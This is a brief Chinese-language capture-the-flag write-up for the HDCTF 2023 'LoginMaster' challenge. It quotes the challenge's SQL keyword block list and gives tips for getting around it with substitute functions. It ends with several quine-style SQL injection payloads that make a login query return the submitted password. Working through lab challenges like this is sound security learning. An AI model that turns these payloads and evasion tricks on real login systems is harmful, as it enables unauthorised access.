[HDCTF 2023]LoginMaster

[HDCTF 2023]LoginMaster

知识点

quine注入

解题

用户名要为admin

查看robots.txt，查看源码

password是注入点

function checkSql($s) 
{if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){alertMes('hacker', 'index.php');}
}
if ($row['password'] === $password) {die($FLAG);} else {alertMes("wrong password",'index.php');

绕过：

subst用mid绕过=，<,>,regexp等号可以用like代替sleep可以用benchmark代替

时间盲注得到表为空。

payload：

'/**/union/**/select/**/replace(replace('"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#',0x22,0x27),0x25,'"/**/union/**/select/**/replace(replace("%",0x22,0x27),0x25,"%")#')#1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#1'union/**/select/**/replace(replace('1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#